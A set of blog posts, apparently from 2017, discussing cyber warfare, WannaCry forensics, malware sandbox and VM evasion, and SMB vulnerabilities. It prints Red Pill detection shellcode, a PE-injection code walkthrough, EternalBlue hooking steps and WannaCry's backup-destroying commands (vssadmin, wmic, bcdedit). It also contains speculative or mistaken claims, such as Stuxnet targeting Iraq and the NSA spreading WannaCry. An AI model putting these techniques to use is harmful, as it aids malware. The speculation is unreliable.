The other side of the story on cyber attack (Electronic war between countries)

 

Preface

We heard  that the new age transformation is coming.  As a result it transform the traditional military weapons to electronic codes. The computer  technologies such as DDOS (Distributed denial of services), malware and virus similar a killer. It can disrupt the financial activities,  daily network communication and health care services. An idea bring to our attention on world war II history was that classic military power result destroyed everything (mankind and properties).  But re-built the society and operation after war. It is a harsh and difficult mission! From technical point of view, the victorious might stand on ethics view point to assists defeated side to rebuild the business and economic system. As a matter of fact, the distruction level of war created by military weapon especially missile it is hard to evaluation. And this is the reason let’s cyber warfare appears in coming future! But it started already!

Analytic result on technical articles about cyber warfare

In regards to my study on technical article issued by CSS Eth Zurich (The Center for Security Studies (CSS) at ETH Zurich).The analytic result highlights serveral key factors of Cyber warfare . Cyber warfare was cheaper than traditional military force. It provides a  “cleaner” (with less or no bloodshed) suitation. No doubt that  less risky for an attacker than other forms of armed conflict. The analytic result  defines 5 different types of cyber conflict during their study. They are Cyber War, Cyber Terrorism, Cyber Espionage, internet crime and cyber vandalism.

The specific feature of cyber weapon (in between country to country)

I was sometimes confused with the headline news on prediction on cyber technology war.  The questions on my mind is that how electronic weapon or cyber weapon replacing traditional military facilities? Think it over, the appropriate technique might adopted target into the following criteria (see below):

The capabilities of cyber attack techniques ( A transformation of traditional military force)

Type Attack technology Functional feature – objective Target – Environment Remark:
Cyber Vandalism, Cyber War IOT & BOTNET (DDOS technique)

 

Services suspension – electronic communication services (IP-Telephony) Bank, Fund House , Stock Exchange
Cyber Espionage Malware Information gathering Bank, Fund House, Stock Exchange & government sector
Cyber War, Cyber Vandalism Ransomware Services suspension important facility fucntion nuclear facility , Airlines,TV broadcast station, Radio broadcast station & military facility Ransomware feature contained facility to supspend the computer services. Besides it capable listen to the instruction of C&C server. On the other hand, the attacker can resume the services once they win the battle.
Traditional military force Bomb Services Suspension on important facility function and destroy permanently nuclear facility, military facility, power station, airport & communiation facility (Digital phone system)
Internet Crime, Cyber war Email phishing and Scam email message Carry out  psychological warfare, implant malware activities in order to fulfill their objective nuclear facility, military facility, power station,

Let us dig out one of the attack technique to see how the cyber technology feature fulfill the goal of the cyber warfare features .

Do you think Ransomware is founded by military department?

The first ransomware appear in the world on 1989. A biologist Joseph L. Popp sent 20,000 infected diskettes labeled
“AIDS Information – Introductory Diskettes” to attendees of the World Health Organization’s international AIDS conference.
But after 90 reboots, the Trojan hid directories and encrypted the names of the files on the customer’s computer.
To regain access, the user would have to send $189 to PC Cyborg Corp. at a post office box in Panama.

In 2006, former President George W. Bush was increasingly worried about Iranian efforts at enriching uranium, and ultimately, its hopes to build an atomic bomb. The goal of Stuxnet is going to destroy Iraq nuclear facilities driven by US government. The rumors were told Stuxnet malware destroyed roughly one-fifth of Iran’s centrifuges in 2009.

An unconfirmed  information stated that there is a separate operation called Nitro Zeus, which gave the US access into Iran’s air defense systems so it could not shoot down planes, its command-and-control systems so communications would go dead, and infrastructure like the power grid, transportation, and financial systems.

Speculation:

WannaCry infection using EternalBlue, an exploit of Windows’ Server Message Block (SMB) protocol.  The U.S. National Security Agency (NSA) had discovered the vulnerability in the past, but used it to create an exploit for its own offensive work, rather than report it to Microsoft. As we know nuclear power facilities control system OS platform relies on Microsoft OS system (see below articles). It may causes people think is there any secret action hide by NSA (National Security Agency). He aroused my interest in questioning who is the key figure to spread WannCry ransome? It looks that there is similarity with Stuxnet worm infection in 2009. Since we all fool by NSA at that time let your computer workstation transform to a cyber army then attack USA enemy.  Do you think wanncry is the rehearsal of test or pilot run?

Malware vs. nuclear power: Do you think SCADA system is the culprit of attack on nuclear power system?

Below diagram is my imagination of the modern nuclear facility environment. The SCADA system pay a key role in nuclear power facility. Ransomeware have capabilities to suspend the services of this facilities. It doesn’t need to destroy anything but the services will be totally shut it down the services. We have seen the real example in UK health care services as a reference. I will stop written here. Should you have any queries, I will try my best to written more in future.

Supplement – The other side of the story on cyber attack (Electronic war between countries) – 13th June 2017

 

As said on above discussion topic, since it looks not interest to visitors on reflection of comments on feedback.  However there is something on my mind need to share.

North Korea President Kim’s intention show to the world of his governance power. He is in frequent to demonstrate his military power cause US government concerns his equalize of military power in the world. To be honest, it is hard to equal the military and economics power as of today. For instance China nearly become the 1st business economic leader. We all know United state is the leader in this moment. However their economic operation chain should have difficulties to do the 2nd round of transformation. Because some of their capital business and business economy contained made in China element.  Since North Korea on finance and business economy are weak. President Kim did such things seems not make sense. I did not visit North Korea however a lot of news on TV might speculate their current situation. I strongly believed that their nuclear facility might operation in 60’s fashion. The SCADA system not possibly supply by Siemens. But learn and develop a windows based SCADA system not difficult.  From information point of view, North Korea nuclear facilities might relies on window for Control Systems instead of Linux for control system.  And therefore Ransomware type attack can specifics shot the target. Meanwhile the business industry from North Korea all work with Microsoft OS  in daily life.

The infection status of wannacry was not issued by North Korea government.  But for sure that wannacry type infection can suspend North Korea business finance and industries operations.

Below are the hints how to eliminate the risks issued by  SCADA system vendor. Any interest?

Process control vendors require:
1. A system with a minimal attack surface, so that biweekly or monthly patches are not required
2. A consistent programming interface that will not change every four to five years, requiring a complete rewrite of their software
3. An environment that can be quickly and safely “locked down” to reduce the risk from hacking
4. A system with limited network access, only through specific ports to reduce the risk of network based attacks
5. Support for priority-based multi-tasking, preferably a real-time operating system (RTOS) that supports hard real-time requirements
6. A robust ecosystem of utilities and tools to make development, installation, debugging, and maintenance as easy as it is on consumer systems.

End of this topic

 

 

 

Must aware during web surfing – protect your personal privacy – turn off your camera on web browser

Preface:

What’s our objective to discussion this topic today? Our goal is going to protect user privacy. As we know, internet traffic are under surveillance. This activities not limited to China nowadays. It was includes the major leader countries in Europe, England and USA.

Situation in China

The country like China provides a clear announcement. The China government was told that all internet traffics in China are under surveillance. And thus that they build the great wall (firewall).  (Tianhe-1 and Tianhe-2 (Milkyway-2) are capable to take this responsibility.

2016 Supercomputer magazine

Situation in United State

How about the surveillance program status from NSA (National security agency) . The NSA has official announcement was that after a comprehensive review of mission needs, current technological constraints, United States person privacy interests, and certain difficulties in implementation, NSA has decided to stop some of its activities conducted under Section 702. For more details, please find below URL for references:

NSA Statement: NSA Stops Certain Section 702 “Upstream” Activities – For more detail, please refer below url for reference.

https://www.nsa.gov/news-features/press-room/statements/2017-04-28-702-statement.shtml

NSA Stops Certain Foreign Intelligence Collection Activities Under Section 702 – For more detail, please refer below url for reference.

https://www.nsa.gov/news-features/press-room/press-releases/2017/nsa-stops-certain-702-activites.shtml

NSA Transparency Report: THE USA FREEDOM Act Business Records FISA Implementation – 15 January 2016 – For more detail, please refer below url for reference.

https://www.nsa.gov/about/civil-liberties/reports/assets/files/UFA_Civil_Liberties_and_Privacy_Report.pdf

Above items given an idea to people our communications (electronic or without electronic) are under surveillance. A positive thinking of idea told yourself that such policy are going to fight against crimes. Apart from that are you aware of your personal privacy especially your mobile phone camera (Lens)? We known more secret on mobile phone recently. The execution of JavaScript or HTML5  allow access your mobile phone camera from Chrome (example shown as below):

Enable camera and microphone in packaged application for Chrome OS

navigator.webkitGetUserMedia({ audio: true, video: true },
            function (stream) {
                mediaStream = stream;
            },
            function (error) {
                console.error("Error trying to get the stream:: " + error.message);
            });    

Remark: The audio and video for a <webview>-embedded page require permission. It will alert mobile phone owner. A software developer hints that the require permission might embedded audioCapture and videoCapture and put the permissions in manifest.json. The mobile phone user might not aware.

Below HTML5 program language which allow to select the source and pass it in as optional into getUserMedia. This function is available in Chrome web browser.

Step 1: Select source

MediaStreamTrack.getSources(gotSources);

Step 2: pass it in as optional into getUserMedia

var constraints = {
  audio: {
    optional: [{sourceId: audioSource}]
  },
  video: {
    optional: [{sourceId: videoSource}]
  }
};
navigator.getUserMedia(constraints, successCallback, errorCallback);

Step 3: Put the permissions on manifest.json or manifest.xml. The mobile phone user might not aware.

Above audio and video capture functions only do a reverse engineering will transform to other criteria of function receive your personal photo. Are you aware of it ?

Summary:

Refer to above information. It looks that we need to spend more job affords to close the back door on your mobile phone, right? But the easy way to do from end user side is that just disable the camera on your mobile phone browser. Or just use a sticker to disable it. It is straight forward, bye!

 

 

 

 

 

 

 

 

 

Modern Sherlock Holmes – Find out the (malware & ransomware) perpetrators.

Preface:

A science concept guide human being to hypothesize boldly, to testify rigorously. It looks to me that this concept is principle but I believe that more terms can enrich our technology life. For example, carry the don’t care term during your development and thinking. That is even though it was unsucessful, you will receive knowledge. You will dig out more during this circumstances.

Remark: Since don’t care term also apply to boolean expression. May be you are think that it is a little bit side track, right. But we are in cyber world. In digital logic, a don’t-care term for a function is an input-sequence (a series of bits) for which the function output does not matter.

OK, we go to the subject matter today. How we imagine that Sherlock Holmes do a study on cybercrime. Find out the (malware & ransomware) perpetrator?

Perform investigation

From digital forensic point of view, the investigation will focus on the following objectives:

Capturing a Live RAM dump
Acquiring a Disk Image
Discovering and Analyzing Evidence
Creating Reports

Since I am not going to suggest that we engage a real exercises now. It is not a good idea without preventive control to execute this job. Run in rush without preparation thus contain inherent risk harm your machine and personal data. So we step back take a hot example (wanna cry) see whether can dig out more idea and information.

Observation Point 1 – Languages

Since we are not going to do a forensic investigation. We simply walk through example (wannacry) on language setup.  From language setup capabilities (see below), it looks that it cover the languages all around the world.

Criminal psychology

From criminal psychology point of view, it looks that the criminal not going to specify a specifics target. A high level point of view that they are looking for money. Fully compatible of language set benefits for their objective.

Observation Point 1.1 – Written language and grammar

From detection point of view, the written language and grammar can provides hints to detective see whether to dig out hints. This hints may speculate for the direction of the detection. For example: the fundamental limitation of mother tongue translation to other native language.

Weakness of this detection method:

Such detection might fool by criminal group and intend to interfere the direction.

Observation Point 2 – Malware written technique:

Some of the times, the written programming style and infection technique might provides hints to detective to the right direction. But a lot of time will interfere the direction of investigation. For example: Wannacry relies on NSA (DoublePulsar) back door software agent or SMB v1 vulnerability (see below picture) to execute the job task. From normal circumstance’s, bad guy will implant a backdoor to victim machine to fulfill the infiltration job task. Unfortunately the backdoor software (DoublePulsar) was given from NSA of their global surveillance program. Wannacry is a ransome software. In the sense that NSA might not be the perpetrator. As a result it interrupt the trace process. The investigator can’t follow the hints to predict who is the appropriate party to do this criminal job.

Observation Point 3 – Down to the grove, execute forensic investigation

Since above observation items might contain fundamental weakness. As a matter of fact, those items of evidences might become a relevant evidence. The fundamental theory by law of relevant evidence interpret that relevant part of evidence is logically connected to the fact it is intended to establish” (Blackwell, 2004).  However the investigator or detective most likely will prefer to execute forensic investigation to receive the digital and demonstrative evidence.

Technical limitation of the forensic investigation

We know that ransomware infection crisis like Wannacry victims suspended Health care services in United Kingdom. The major effect which harm to whole hospital services over there! Since healthcare services maintains compliance standard. It is possible to let the forensic investigator do the investigation (see below step).

1. Capturing a Live RAM dump
2. Acquiring a Disk Image
3. Discovering and Analyzing Evidence
4. Creating Report

However a technical limitation has been found on traditional digital forensic investigation criteria.

Few evidences will be lost once victim power off their machine.
Victim which have technical know how will erase some evidence
Audit log disable by default

Advanced technology enhance  the limitation on their investigation algorithm

Technology company note with alert of the technical weakness during forensics investigation. A preventive mechanism was build to avoid lost of critical data after system power off. The enhancement is that an software agent will be installed on the workstations. The software agent will collect the delta (data change) and then forward to the centralized repository in real time.

As we know, no design and solution is prefect. For this enhancement it is prefect to implement to enterprise or corporate environment. For workstation for personal usage it is difficult to implement. A drawback alert to the detective or government enforcement team that there is a technical limitation on personal devices (personal computer workstations, mobile computing devices and IoT devices).
Multi-angle detection architecture
Readers, if you can read this down to here, we might know the mentioned investigation mechanism are able to collect the following details.

(1) Memory dump, (2) disk image, (3) malware activities finger print, (4) virus and malware types, (5) C&C server public IP address and (6) malware dropper file.

Even through we received above informations on hand. However, it is hard to provide a comprehensive of evidence proof who is the perpetrator! For example, it is hard to collect the information details once workstation compromised by wannacry. As a matter of fact the whole disk has been encrypted. So, what’s the next step when investigator face this problem.

Refer to below picture, you might aware that point C (C&C server) and point D (victim compromised web server) are located in different regions. They are not in single operation. Even though Forensics investigator are able to decrypted the hard disk or collect the activities log from their SIEM device. The trace result sometimes mislead the location of the area. It is hard to provides a clear picture. In order to identify the root sources. A detection terminology so called multi angle detection algorithm will be assist investigator in such circumstances.

The concept idea is that investigator will summarize the following entities.

1. Total no. of C&C servers and their IP addresses
2. Total no. of Victims (compromised web server) and their IP address
3. Categorized the IP address and highlight the IP address region

Remark: As we know, hacker will relies on Tor network to hide himself in effective manner. Since it is hard to know their location status once their connectivities get inside to the onion network (Tor network).

4. Execute forensic investigation to the compromised server (Point D)

5. Find out the C&C server connectivity (Point C)

6. Sometimes law enforcement team not going to let hacker know they has been traced. The job might run on ISP side (Point B). For instance, they will lock down the appropriate tor certificate and filter the certificate Issuer and Subject ID patterns.

7. Since two important elements (tor cert and C&C server public IP address) are known. It is more easy to do the following to find out the attacker source IP address:

a.  Define correlation rule to find out the source IP address of the attacker.

b. Apply Google analytic methodology to figure out the attacker IP address.

8. The final action is activate the local police force to arrest the hacker.

Summary:

Regarding to above description it looks that it is not easy to lock down the hackers actual location. Heard that some security expert relies on English written skill or C&C server to predict the attacker source IP address. From technical point of view, it might contained distortion.

 

 

Modern Malware intelligence

Preface:

More people pay attention on cyber security world this year, the tremendously cyber security incidents  known as ATM thieves,  NSA scandal, IoT DDOS & recently WannaCry ransomware cyber security incident. Since more and I forgot. But those incidents have common criteria. The culprits of the infection techniques are given by malware technology.

Evolution

Before the term malware was introduced by Yisrael Radai in 1990, malicious software was referred to as computer viruses. A conceptual idea categories Malware to the following elements such as trojan horses, worms, spyware, RootKit and Botnet. For more details, please refer to below diagram for references.

Defense

How modern technique fight against malware:

Preventive control mechanism

Address Space Layout Randomization (ASLR):

This feature randomizes how and where important data is stored in memory, making it more likely that attacks that try to write directly to system memory will fail because the malware can’t find the specific location it need.

Data Execution Prevention (DEP):

This feature substantially reduces the range of memory that code can run in.

How malware break the ice

Evasion technique against Sandbox

Evasion technique 1:

To avoid Sandbox detection –  Refresh the malware body (executable file) frequently (Checksum – hash) such a way benefits avoid signature-based antivirus software detection.

Evasion technique 2:

Malware can search through physical memory for the strings, new generation of malware commonly used to detect memory artifacts. For instance by default, Metasploitable’s network interfaces are bound to the NAT and Host-only network adapters, and the image should never be exposed to a hostile network (This is the vulnerability of metasploit , they fixed already). Malware contains intelligence detect sandbox status.  No activities will be taken once sandbox has been detected.

Evasion technique 3:

Sandbox might uses a pipe \\\\.\\pipe\\cuckoo for the communication between the host system and the guest system. A malware can request the file to detect the virtual environment.

Evasion technique 4:

Since open source applications are popular in IT world. And therefore a lot of security analysis will built their own sandbox. The cuckoo sandbox deployment covered certain amount of percentage. Meanwhile malware enhance their intelligence. They can detect the cuckoo agent. Cuckoo uses a python agent to interact with the host guest. By listing the process and finding python.exe or pythonw.exe or by looking for an agent.py in the system, a malware can detect Cuckoo.

Evasion technique 5:

Most of the modern workstation  has installed at least 4GB or more memory. Malware developer setup the intelligence that machines with less memory size may become a sandbox setup.

Evasion technique against Virtual machine environment
Red Pill

Red Pill is a technique to detect the presence of a virtual machine. The code display below can be used to detect whether the code is executed under a VMM or under a real environment.

Red Pill developed by Joanna Rutkowska

Swallowing the Red Pill is more or less equivalent to the following code (returns non zero when in Matrix):

     int swallow_redpill () {
unsigned char m[2+4], rpill[] = “\x0f\x01\x0d\x00\x00\x00\x00\xc3”;
*((unsigned*)&rpill[3]) = (unsigned)m;
((void(*)())&rpill)();
return (m[5]>0xd0) ? 1 : 0;
}

Remark: SIDT instruction (encoded as 0F010D[addr]) can be executed in non privileged mode (ring3) but it returns the contents of the sensitive register, used internally by operating system.

Theory: The virtual machine monitor must relocate the guest’s IDTR to avoid conflict with the host’s IDTR. Since the virtual machine monitor is not notified when the virtual machine runs the SIDT instruction, the IDTR for the virtual machine is returned. Thereby the process gets the relocated address of IDT table. It was observed that on VMWare, the relocated address of IDT is at address 0xffXXXXXX, while on Virtual PC it is 0xe8XXXXXX.

No Pill (Store Global Descriptor Table-SGDT & Store Local Descriptor Table-SLDT)

The sgdt and sldt instruction technique for VMware detection is commonly known as No Pill. The No Pill technique relies on the fact that the LDT structure is assigned to a processor not an Operating System. The LDT location on a host machine result zero. While a virtual machine result non-zero.

Evasion technique: Especially POS system

Malware use a smart way to evade of sandbox. The method is use hash to replace API program name, uses a table of hash values to ignore certain processes from being parsed by sandbox.

Intangible of attack benefits evasion of sandbox detection

We alert ourself that malware most likely using below methods to avoid sanbox antivirus or sandbox detection.

  • Hide the code which may be recognized as malicious. This is generally done using encryption.
  • Code the decryption stub in such a way it is not detected as a virus nor bypassed by emulation/sandboxing.

However we known that there are intangible of attacks on internet. Such work style of attack benefits for malware avoid the sandbox detection.

PE inject:

PE injection looks more powerful than classic code injection technique. Whereas it does not require any shell coding knowledge. The malicious code can be written in regular C++ and relies on well documented Windows System and Runtime API. Compared to DLL injection the main asset of PE injection is that you don’t need several files, the custom malicious code self inject inside another normal process and therefore it might possibilities to bypass detection.

Example for reference:

Hacker compromise a web site and lure the visitor visit the web page. During the visit an message alert the visitor that in order to display correct content, they need to download the font. From technical point of view, antivirus might detect the malicious once download if it is a known virus. Otherwise the malware can execute the following actions:

Socket creation and network access
Access to filesystem
Create threads
Access to system libraries
Access to common runtime libraries

How does malware complete the job?

Calculate the amount of memory (need to allocate)
  1. /* Get image of current process module memory*/
  2. module = GetModuleHandle(NULL);
  3. /* Get module PE headers */
  4. PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS)((LPBYTE)module + ((PIMAGE_DOS_HEADER)module)->e_lfanew);
  5. /* Get the size of the code we want to inject */
  6. DWORD moduleSize = headers->OptionalHeader.SizeOfImage;
Calculate the new addresses to set in the distant process
  1. /* delta is offset of allocated memory in target process */
  2. delta = (DWORD_PTR)((LPBYTE)distantModuleMemorySpace – headers->OptionalHeader.ImageBase);
  3. /* olddelta is offset of image in current process */
  4. olddelta = (DWORD_PTR)((LPBYTE)module – headers->OptionalHeader.ImageBase);
The relocation data directory is an array of relocation blocks which are declared as IMAGE_BASE_RELOCATION structures.
  1. typedef struct _IMAGE_BASE_RELOCATION {
  2. ULONG VirtualAddress;
  3. ULONG SizeOfBlock;
  4. } IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION;
Relocation data directory

=================================================
Relocation Block 1                                        | Relocation Block 2
VAddr|SizeofBlock|desc1|desc2|desc3| VAddr|SizeofBlock|desc1|…
32b      32b                16b       16b      16b     |
=================================================

Relocation descriptors in all relocation blocks, and for each descriptor, modify the pointed address to adapt it to the new base address in the distant process
  1. /* Copy module image in temporary buffer */
  2. RtlCopyMemory(tmpBuffer, module, moduleSize);
  3. /* Get data of .reloc section */
  4. PIMAGE_DATA_DIRECTORY datadir = &headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
  5. /* Point to first relocation block copied in temporary buffer */
  6. PIMAGE_BASE_RELOCATION reloc = (PIMAGE_BASE_RELOCATION)(tmpBuffer + datadir->VirtualAddress);
  7. /* Browse all relocation blocks */
  8. while(reloc->VirtualAddress !=0)
  9. {
  10. /* We check if the current block contains relocation descriptors, if not we skip to the next block */
  11. if(reloc->SizeOfBlock >=sizeof(IMAGE_BASE_RELOCATION))
  12. {
  13. /* We count the number of relocation descriptors */
  14. DWORD relocDescNb = (reloc->SizeOfBlock – sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
  15. /* relocDescList is a pointer to first relocation descriptor */
  16. LPWORD relocDescList = (LPWORD)((LPBYTE)reloc + sizeof(IMAGE_BASE_RELOCATION));
  17. /* For each descriptor */
  18. for(i =0; i < relocDescNb; i++)
  19. {
  20. if(relocDescList[i]>0)
  21. {
  22. /* Locate data that must be reallocated in buffer (data being an address we use pointer of pointer) */
  23. /* reloc->VirtualAddress + (0x0FFF & (list[i])) -> add botom 12 bit to block virtual address */
  24. DWORD_PTR *p = (DWORD_PTR *)(tmpBuffer + (reloc->VirtualAddress + (0x0FFF & (relocDescList[i]))));
  25. /* Change the offset to adapt to injected module base address */
  26. *p -= olddelta;
  27. *p += delta;
  28. }
  29. }
  30. }
  31. /* Set reloc pointer to the next relocation block */
  32. reloc = (PIMAGE_BASE_RELOCATION)((LPBYTE)reloc + reloc->SizeOfBlock);
  33. }

Once the code is injected, hacker can attempt to call its functions.

Overall comment on above matter:

Above details only provide an idea to reader know your current situation in Cyber World.  There are more advanced hacking technique involved.  The motivation driven myself to do this quick research. My goals is going to let’s IT users know more in this regard.

 

Coming soon!
How does the advanced technology fight with Dark Power

Advanced technology against Dark Power

 

 

 

 

 

 

 

 

 

How to rescue yourself on this month. SMB flaw, apply to all windows platform

Quote:

By connecting to a malicious SMB server, a vulnerable Windows client system may crash (BSOD) in mrxsmb20.sys

Blocking outbound SMB connections – TCP ports 139 and 445 along with UDP ports 137 and 138 – from the local network to the wide area network…..said US CERT

Reminder: Mrxsmb20.sys driver handles SMB 2.0 and SMB 3.0 traffic.

Windows OS design objective: In Windows 8, the SMB 3.0 protocol is supported. The Mrxsmb10.sys driver handles legacy SMB traffic, and the Mrxsmb20.sys driver handles SMB 2.0 and SMB 3.0 traffic.

Phenomenon: We have confirmed that without apply the patch on May those Windows 10 , Windows 8.1 client systems as well as the server equivalents of these platforms, Windows Server 2016 and Windows Server 2012 R2 are all encountered SMB vulnerability. In the sense that it is vulnerable.

Current Situation 1: If you are windows OS home user (all windows OS platform), be aware and confirm apply below hot-fix to your home workstation.

https://technet.microsoft.com/en-us/library/security/ms17-012.aspx

Current Situation 2:If you are IT guy maintained whole bunch of MS windows server. You are the technical expert and believed that the hotfix you apply already. But I would like to bring your attention of on server SMB registry.

What’s the reason to point out the SMB registry. It is a quick way to isolate the problem once you suspect that you file server may encounter malicious attack. As a matter of fact, registry check is one of the fast path know what is happen in malware movement.

Regarding to the subject matter, our objective is going to discuss how to rescue yourself this month due to SMB flaw, right? I written an techincal article yesterday mainly highlight the SMB flaw. For more details, please find below url for reference.

Does SMB mess up the world? But he is sick always! …Wanacrypt0r, SMB worm,…etc

Any information update will keep posted. Thank you for your kind attention.

Does SMB mess up the world? But he is sick always! …Wanacrypt0r, SMB worm,…etc

Preface:

Ransomware (#wanacrypt0r #wannacry #ransomware #wcry) outbreak since last Friday 12th May 2017 till this week. Believed that no room discuss here since you are easy to get the information update on internet. However SMB is our discussion topic today. As we know SMB ver 1 is the culprits of Wanacrypt. The side effect looks only affected outdated windows OS (2003,XP,Me and Vista) or recently end of support product (Windows 2008 instead of 2008 R2)! In the meantime, do you have issue to worry like myself on SMB version 2 and version 3?

SMB critical flaw historical background:

Vulnerability in Microsoft Windows SMB2 -_Smb2ValidateProviderCallback()  flaw found 2009.

An attacker could exploit this flaw to disable the remote host or to execute arbitrary code on it.
Solution: As a workaround, you can disable SMB2 by editing the registry.Under the hive HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters

Create the key ‘Smb2’ (of type REG_DWORD) and set it to ‘0’

On August 11, 2015 Microsoft released  SMB Server fix on SMB (MS15-083 – Microsoft Windows SMB Memory Corruption Vulnerability). An authenticated remote code execution vulnerability exists in Windows that is caused when Server Message Block (SMB) improperly handles certain logging activities, resulting in memory corruption. A successful exploit could corrupt memory in such a way as to allow the attacker to execute arbitrary code. A successful exploit could result in a complete system compromise.

SMB architecture

The structure of the header is as follows:

SMB_Header
   {
   UCHAR  Protocol[4];
   UCHAR  Command;
   SMB_ERROR Status;
   UCHAR  Flags;
   USHORT Flags2;
   USHORT PIDHigh;
   UCHAR  SecurityFeatures[8];
   USHORT Reserved;
   USHORT TID;
   USHORT PIDLow;
   USHORT UID;
   USHORT MID;
   }

 

Why SMB always encounter vulnerabilities? Why old version of SMB need to stay on windows OS?

NSA surveillance  tool kit named EternalBlue exploits a vulnerability on SMB. From my personal point of view, not surprise! Since no operation systems are prefect, right! But the earliest time SMB encountered flaw was back time to 2009. A flaw was found on Microsoft SRV.SYS Driver. The symptom exploit that a Remote Code Execution vulnerability in Microsoft SMB Servers (WriteAndX Invalid DataOffset).

Remark: Srv.sys is a Windows driver. A driver is a small software program that allows your computer to communicate with hardware or connected devices. This means that a driver has direct access to the internals of the operating system, hardware etc (see below picture for reference). Microsoft suggest that Srv.sys should be set to start on demand since it is only communicate with old fashion client such as windows XP.

Command: sc config srv start=demand

Regarding to security vendor Rapid 7 findings on 2009, Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table exploits an out of bounds function table dereference in the SMB.

Looks irritating, we are not going to post all the flaws. But I am interested that is there something get wrong from fundamental design causes such non stop vulnerability. As far as I know, all SMB family are easy to causes vulnerable. Even though SMB3! An official announcement by Microsoft highlight that transferring files by using SMB2 or SMB3 causes memory leak on a windows computer (see below url for reference). And then Microsoft issued a hotfix held on 2017.

https://support.microsoft.com/en-us/help/2928360/transferring-files-by-using-smb2-or-smb3-causes-memory-leak-on-a-windows-computer

Our Observation:

Take the latest reference as an example. See how the weakness of SMB. Yes, it is not a SMB2 or 3.  Since SMB2 and SMB3 obtain their own design weakness on memory validation (see above description). OK, Let’s go. We start the journey.

Equation Group’s (NSA) wake up all the IT guys, attacker can easy initiate a Ring 0 attack relies on SMB. They  took below action:

  1. Determine x86 or x64
  2. Confirm and locate the IDT(Interrupt Descriptor Table) from the KPCR( (Kernel) Processor Control Region).
  3. Viewing Physical Memory Addresses in OllyDbg, Traverse backward from memory address. That means from end return to 1st interrupt handler to find ntoskrnl.exe base address.
  • If the beginning of the file does not begin with “MZ” or “ZM”, it is not an DOS or Windows executable image. Otherwise you may have one of the following types of executable formats: plain DOS, NE (Windows 16-bit), LE (16-bit VXD), PE32, or PE32+ (PE64).
  • Determine if you have a plain DOS executable by looking at the e_lfanew value. A plain DOS executable will have an out-of-range e_lfanew pointing outside of the limits of the file, a zero, or if the offset happens to be in range, the signature at its offset won’t match any signatures below.
  • Try to match the signature of the “in-range” offset pointed to by e_lfanew with the following WORD or DWORD values:
    "PE" followed by two zero bytes if the image is a PE32 or PE32+ (PE64) and is further determined by the "magic" in the NT Optional Header
    "NE" indicates the image is a 16-bit Windows executable
    "LE" indicates the image is a 16-bit Virtual Device Driver (VXD)
    

5. Reads ntoskrnl.exe’s exports directory, and uses hashes to find ExAllocPool/ExFreePool/ZwQuerySystemInformation functions.

Remark: If you would like to call ZwQuerySystemInformation, a parameter need attach with the command. You must input buffer as size of SYSTEM_PROCESS_INFORMATION. And then checking the return value and return requied size. If the return is not success, you must make the second call with input buffer of requied size (i.e.size return from the first call).

6. Calls ZwQuerySystemInformation with the SystemQueryModuleInformation argument, which loads a list of all drivers. It uses this to locate Srv.sys, an SMB driver.

7. Switches the SrvTransactionNotImplemented() function pointer located at SrvTransaction2DispatchTable[14] to its own hook function.

Remark: Npp buffer + 0x100 directly written before the leak out of the function table

Above scenario happen SMB or SMB v1 only.  But when we know SMB2 and SMB3 also found vulnerability on memory side.  My research is on the way, my friend I will keep you posted if there is anything updating.

Security Alert ! Trap of wannacry – status update on 29th May 2017

Is it anti-tradition? IT folks, do you white list ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com. Expert was told, the strange design of Wannacry will stop spread the ransomware to known subnet once he can get in touch with his C&C server. But do you think this is a trap? I speculated that ramsomware intend to create this trap fool the guy who think this is a solution and then can easy go to their internal network in 2nd phase. So the better idea is that do not input this domain into your whitelist. Cheers!

Information update on 18th May 2017

Recently Wana Decrypt0r 2.0 C&C server:

  • 57g7spgrzlojinas.onion
  • xxlvbrloxvriy2c5.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion

Wana Decrypt0r 2.0 modify the Windows Registry Editor and target the following sub-keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
HKCU\Software\WanaCrypt0r\
HKCU\Software\WanaCrypt0r\wd
HKCU\Control Panel\Desktop\Wallpaper

Encryption algorithms:

  • AES (Advanced Encryption Standard) 128 –  cannot be decrypted the file until you receive the FEK (File Encryption Key). This key may be the only method to decrypt the files .

Structure of an Encrypted File

Rivers-Shamir-Adleman or RSA – Wanncry design objective intent to generate unique public and private keys for each of the files. This makes the decryption of each file separate and very difficult and unique process.

Observation:

Attention: If no data backup on hand, it is hard to say pay the ransom is the solution. Since WanaCrypt0r .WNCRY contained extreme destroy concept and enforce to delete the shadow volume copies and eradicate all chances of reverting your files via backup on the infected computer (see below destroy scenario command syntax). The security concern is that it is hard to guarantee that it is virus free after hard disk encrypt on victim machine. As a matter of fact, WannCry via an Exploit kit, Dll file attack, malicious JavaScript or a drive-by download of the malware. No evident to proof that WannCrypt0r will remove his footprint after victim pay the ransom and therefore victim machine still vulnerable until execute a low level format of the hard disk and reinstall all the application. But it is hard to tell at this moment. Therefore it must be handle the data carefully after you pay the ransom.

The extreme destroy command syntax are shown as below:

  1. vssadmin delete shadows /all /quiet2.
  2. wmic shadowcopy delete

Remark: At user level below command can do in the following step: Go to Start Menu-All Programs-Accessories,then right-click Command Prompt and select Run As Administrator,because Administrative privileges are required to use BCDEdit to modify BCD

3. bcdedit /set boostatuspolicy ignoreallfailures
4. bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

Hints and Resolution found on 19th May 2017

Hints that Windows 7, XP, Windows 2003 (x86 confirmed), Vista and 2008 and 2008 R2 instead of Windows 10 . The OS itself  keeps a copy of the two prime numbers that it provided to WannaCry in memory.  Those primes can be recovered. It is possible to relies on this feature to compute the encryption key and then used to decrypt all encrypted data. A tool make use of above criteria and might have way to decrypt your data. For more details, please refer to below url for reference.

https://github.com/aguinet/wannakey

If above hints can’t help and you would like to keep the encrypted data. You can do the following.

Backup all your files (00000000.eky and remaining files). May be in future, there is new resolution which provide the key decrypt your data.

Part 3 : Blockchain technology – Trend benefits finance and crime

Preface:

Take on public transportation today (11th May 2017), the headline news display on advertisement screen guide me start the discussion on block chain technology again.  It looks a realistic situation intend to boots up block chain technology growth. Let’s take a quick seen!

